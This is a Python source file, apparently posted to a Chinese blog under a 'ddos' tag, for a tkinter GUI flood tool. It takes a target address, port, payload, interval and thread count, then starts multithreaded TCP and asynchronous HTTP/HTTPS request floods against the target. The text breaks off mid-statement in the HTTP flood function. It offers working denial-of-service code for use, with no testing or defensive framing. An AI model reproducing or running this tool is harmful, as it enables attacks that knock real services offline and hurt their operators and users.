import tkinter as tk
from tkinter import messagebox
import socket
import threading
import time
import logging
import re
import asyncio
import aiohttp
# Set up logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Global variable to manage threads
attack_threads = []
running = False # Global variable to control the attack state
# Function to start the attack
def start_attack():
global running
running = True # Set running to True when starting the attack
try:
# Retrieve and validate inputs
target = target_entry.get().strip()
port = port_entry.get().strip()
attack_type = attack_type_var.get().strip()
payload = payload_entry.get().strip()
interval = interval_entry.get().strip()
num_threads = num_threads_entry.get().strip()
# Check for empty inputs
if not all([target, port, attack_type, payload, interval, num_threads]):
raise ValueError("请输入所有参数")
# Validate port
port = validate_port(port)
# Validate interval
interval = validate_positive_float(interval)
# Validate number of threads
num_threads = validate_positive_integer(num_threads)
# Validate target (IP or domain)
if not validate_ip(target) and not validate_domain(target):
raise ValueError("ip地址错误")
# Start attack based on type
for _ in range(num_threads):
if attack_type == 'TCP':
thread = threading.Thread(target=send_tcp_flood, args=(target, port, payload.encode(), interval))
elif attack_type == 'HTTP':
thread = threading.Thread(target=asyncio.run, args=(send_async_http_flood(target, port, payload.encode(), interval),))
elif attack_type == 'HTTPS':
thread = threading.Thread(target=asyncio.run, args=(send_async_https_flood(target, port, payload.encode(), interval),))
attack_threads.append(thread)
thread.start()
messagebox.showinfo("Success", "启动成功!")
except ValueError as ve:
messagebox.showerror("Input Error", str(ve))
except Exception as e:
messagebox.showerror("Error", f"{e}")
def validate_ip(ip):
ip_regex = re.compile(
r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
)
return re.match(ip_regex, ip) is not None
def validate_domain(domain):
domain_regex = re.compile(
r'^(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}$'
)
return re.match(domain_regex, domain) is not None
def validate_port(port):
try:
port = int(port)
if port < 1 or port > 65535:
raise ValueError("端口在 1 到 65535之间")
return port
except ValueError:
raise ValueError("端口需要是个整数")
def validate_positive_float(value):
try:
value = float(value)
if value <= 0:
raise ValueError("需要是个整数")
return value
except ValueError:
raise ValueError("需要是个整数")
def validate_positive_integer(value):
try:
value = int(value)
if value <= 0:
raise ValueError("需要是个整数")
return value
except ValueError:
raise ValueError("需要是个整数")
def stop_attack():
global running
running = False # Set running to False to stop the attack
for thread in attack_threads:
if thread.is_alive():
thread.join() # Wait for the thread to complete
attack_threads.clear() # Clear the list of threads
messagebox.showinfo("Stopped", "停止成功")
# Function to send TCP flood attack
def send_tcp_flood(target, port, payload, interval):
while running: # Check if running is True
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, port))
s.send(payload)
time.sleep(interval)
except Exception as e:
logging.error(f"TCP 连接失败: {e}")
break # Exit the loop on error
# Asynchronous function to send HTTP flood attack
async def send_async_http_flood(target, port, payload, interval):
url = f"http://{target}:{port}"
async with aiohttp.ClientSession() as session:
while running: # Check if running is True
try:
async with session.get(url, data=payload) as response:
logging.info(f"
标签:target,attack,ddos,threads,简单,import,validate,port
From: https://www.cnblogs.com/qcy-blog/p/18630629